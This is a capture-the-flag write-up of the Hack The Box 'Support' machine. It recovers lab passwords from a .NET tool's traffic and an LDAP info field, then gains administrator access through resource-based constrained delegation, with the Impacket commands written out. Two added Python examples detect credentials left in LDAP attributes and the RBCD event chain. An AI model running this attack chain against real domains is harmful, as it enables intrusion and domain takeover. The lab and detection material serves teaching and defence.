# Support HTB

```
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-13 15:17:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-03-13T15:17:24
|_  start_date: N/A
|_clock-skew: -22h27m54s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

Enumerating SMB with `smbmap -u guest -H dc.support.htb`:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-999745f376763e783344a8afbfa4844c47e75020%2F0eaa4c96ba9cc6c495d72e7a3b23f2c1.png?alt=media)

We access the share with `smbclient \\\\dc.support.htb\\support-tools -N --no-pass`:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ce6c931c618ef2f92f3e2060f373ce03645d1579%2F1e4e24d5e0634cb95cc0acccac485a00.png?alt=media)

We find an unusual application called UserInfo.exe, so we run it with mono:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-05f5ffe69310cabe5cf68f63d4578236e034c1e3%2F0a59824e486b625a5f1c069d6492d0ec.png?alt=media) ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-9228d4323443aa9d2ca1374fda59d6bcf825f113%2Fb7b10ace6a12bcb93b670ed4c5431082.png?alt=media)

Sniffing the traffic with Wireshark (dnSpy would also work, since it is a .NET application) we find:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-680569d1fa93c0fae24090eb97967ac5a8758186%2F0596661da7b2ef0dc532acb477335171.png?alt=media)

Following the TCP stream:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-17fd1751173edab655b6125853dabba5761b92c9%2F40a14c2895e1383b1292a0046e31c265.png?alt=media)

This appears to be a cleartext password for a user called ldap. Trying the password with

```
cme smb 10.10.11.174 -u ldap -p "$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz"  
```

It doesn't work:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-23c5e0dbfcf9dcf9be0fd3f1538b1edfa75232a8%2F32b86ba267b37d2b66156fd739dfecfc.png?alt=media)

But using single quotes and removing the leading "$" makes it work. Inside double quotes the shell treats every `$name` sequence as a variable expansion, so the password that was actually sent to the server was mangled; single quotes pass it through literally.

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-2d598906f473b5959ed1b4996eb99e03a8463560%2Ff9ae5235e9d403f553c4af5f1971f6e8.png?alt=media)

Now we use bloodhound.py to collect info:

```
bloodhound.py -dns-tcp -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -d support.htb -c all
```

We find almost nothing of value, but the *support* user looks interesting.

Now we use ldapsearch:

```
ldapsearch -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" -H ldap://support.htb > ldap.out
```

Checking the `info` field in the ldapsearch output, we find a password for support:

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-230198677f50b7ac59ce6574a06e4349563498a2%2F3f4567f9d3d91506e4601a7d98ace517.png?alt=media)

`support:Ironside47pleasure40Watchful`
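
Finding the password above meant reading through `ldap.out` by hand. The following is an added example (not part of this writeup) of how a defender can audit the same free-text attributes (`info`, `description`, `comment`) across a whole ldapsearch dump: it parses LDIF properly, including folded continuation lines and base64 (`::`) values, and flags any user object whose note looks like a typed-in credential. The sample LDIF, the account names and the heuristic regex are all constructed for the example.

```python
import base64
import re
from typing import Dict, Iterator, List, Tuple

# Constructed ldapsearch (LDIF) output, not the box's real dump: two user
# entries, one folded continuation line, one base64 ("::") value, and one
# credential-like string parked in the free-text "info" attribute.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=example,DC=test> with scope subtree

dn: CN=alice,CN=Users,DC=example,DC=test
objectClass: top
objectClass: user
sAMAccountName: alice
description: Helpdesk operator on the sec
 ond floor
info: Opens tickets for the sales team

dn: CN=support,CN=Users,DC=example,DC=test
objectClass: top
objectClass: user
sAMAccountName: support
info:: Q29uc3RydWN0ZWQ0N3Bhc3M0MFZhbHVl
"""

# Free-text attributes where admins tend to leave notes (and, sometimes, secrets).
FREE_TEXT_ATTRS = ("info", "description", "comment")

# Heuristic: one token of 10+ non-space characters mixing letters and digits
# looks like something typed in as a password. Expect false positives
# (hostnames, ticket ids); every hit still needs a human to look at it.
_CRED_TOKEN = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)\S{10,}$")


def parse_ldif(text: str) -> Iterator[Dict[str, List[str]]]:
    """Yield one {attribute: [values]} dict per LDIF entry.

    Handles '#' comments, blank-line entry separators, folded lines (a
    continuation starts with one space) and base64 values ('attr:: ...').
    Base64 is decoded only after unfolding, so long folded values survive.
    """
    pending: List[List] = []  # [attr, is_base64, raw_value] per attribute line

    def finish() -> Dict[str, List[str]]:
        entry: Dict[str, List[str]] = {}
        for attr, is_b64, raw in pending:
            value = base64.b64decode(raw).decode("utf-8", "replace") if is_b64 else raw
            entry.setdefault(attr, []).append(value)
        return entry

    for line in text.splitlines():
        if line.startswith("#"):
            continue
        if line == "":
            if pending:
                yield finish()
                pending.clear()
            continue
        if line.startswith(" ") and pending:
            pending[-1][2] += line[1:]  # unfold continuation line
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue  # not an attribute line
        if value.startswith(":"):  # "attr:: <base64>"
            pending.append([attr, True, value[1:].strip()])
        else:
            pending.append([attr, False, value.strip()])
    if pending:
        yield finish()


def find_credential_like_values(text: str) -> List[Tuple[str, str, str]]:
    """Return (account, attribute, value) for every user object whose
    free-text attribute holds a credential-looking token."""
    findings = []
    for entry in parse_ldif(text):
        if "user" not in entry.get("objectClass", []):
            continue
        who = entry.get("sAMAccountName", entry.get("dn", ["?"]))[0]
        for attr in FREE_TEXT_ATTRS:
            for value in entry.get(attr, []):
                if _CRED_TOKEN.match(value):
                    findings.append((who, attr, value))
    return findings


if __name__ == "__main__":
    for who, attr, value in find_credential_like_values(SAMPLE_LDIF):
        print(f"{who}: {attr} looks like a credential: {value!r}")
```

Run it against a real dump with `find_credential_like_values(open("ldap.out").read())`; the `info` value on this box would be flagged because it is one long mixed letters-and-digits token with no spaces.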

Now we attack using the GenericAll permission.

Creating a machine account: `addcomputer.py -method SAMR -computer-name 'aditya' -computer-pass 'Aditya123@' -dc-host dc.support.htb -domain-netbios support.htb 'support.htb/support:Ironside47pleasure40Watchful'`

Delegation from aditya to dc: `rbcd.py -delegate-from 'aditya$' -delegate-to 'dc$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'`

Now getting the ticket: `getST.py -spn 'www/dc.support.htb' -impersonate administrator 'support.htb/aditya$:Aditya123@'`

Now to get a shell: `KRB5CCNAME=administrator.ccache psexec.py -dc-ip 10.10.11.174 support.htb/administrator@dc.support.htb -k -no-pass`

![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-faa237d29b15aea6ab5916c9e37b458d5754715b%2F6371698950c7a8efc5e46d6acb5c551a.png?alt=media)
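
The chain above leaves a distinctive trail in the domain controller's security log: a computer account is created by an ordinary user, and shortly afterwards that same user writes `msDS-AllowedToActOnBehalfOfOtherIdentity` on the DC's computer object. The following is an added detection example (not part of this writeup) that correlates those two steps. The event IDs are the standard Windows ones (4741 = computer account created, 5136 = directory service object modified; 5136 only fires when "Audit Directory Service Changes" is enabled and the object carries a SACL), but the record layout, timestamps, principal names and the allowlist of expected account creators are constructed for the example, and the check that the target lives under `OU=Domain Controllers` assumes the default OU layout.

```python
from dataclasses import dataclass
from typing import Dict, List

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
# Constructed allowlist: principals that are expected to join machines to the domain.
PRIVILEGED = {"SUPPORT\\Administrator"}
# Creation followed by an RBCD write within this many seconds is treated as one chain.
WINDOW_SECONDS = 3600

# Constructed, simplified security events (not real Windows log output):
# "t" is seconds, "id" is the Windows security event id.
SAMPLE_EVENTS: List[Dict] = [
    {"t": 100, "id": 4741, "subject": "SUPPORT\\Administrator", "target": "WS01$"},
    {"t": 200, "id": 4741, "subject": "SUPPORT\\support", "target": "ADITYA$"},
    {"t": 260, "id": 5136, "subject": "SUPPORT\\support",
     "object": "CN=DC,OU=Domain Controllers,DC=support,DC=htb", "attribute": RBCD_ATTR},
    {"t": 300, "id": 5136, "subject": "SUPPORT\\Administrator",
     "object": "CN=WS01,CN=Computers,DC=support,DC=htb", "attribute": "description"},
]


@dataclass
class Finding:
    severity: str
    subject: str
    detail: str


def detect_rbcd_chain(events: List[Dict]) -> List[Finding]:
    """Flag unprivileged machine-account creation, RBCD writes on domain
    controllers, and the combination of both by the same principal."""
    findings: List[Finding] = []
    creations: Dict[str, List] = {}  # subject -> [(t, new computer account)]
    for e in sorted(events, key=lambda ev: ev["t"]):
        if e["id"] == 4741 and e["subject"] not in PRIVILEGED:
            # Any non-admin creating a computer account is worth a look on its own.
            creations.setdefault(e["subject"], []).append((e["t"], e["target"]))
            findings.append(Finding("medium", e["subject"],
                                    f"created computer account {e['target']}"))
        elif e["id"] == 5136 and e["attribute"] == RBCD_ATTR:
            on_dc = "OU=Domain Controllers" in e["object"]
            findings.append(Finding("high" if on_dc else "low", e["subject"],
                                    f"wrote {RBCD_ATTR} on {e['object']}"))
            # Same principal created a machine account shortly before: full chain.
            for t, target in creations.get(e["subject"], []):
                if on_dc and 0 <= e["t"] - t <= WINDOW_SECONDS:
                    findings.append(Finding("critical", e["subject"],
                                            f"RBCD chain: created {target} then "
                                            f"delegated it to {e['object']}"))
    return findings


if __name__ == "__main__":
    for f in detect_rbcd_chain(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.subject}: {f.detail}")
```

Wiring this to a SIEM means mapping the real 4741 (Subject Account Name, New Computer Account Name) and 5136 (Subject, Object DN, LDAP Display Name) fields onto the dict keys used here; the correlation logic itself does not change. The `high` finding on its own is already actionable, since legitimate RBCD configuration on a domain controller is rare.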
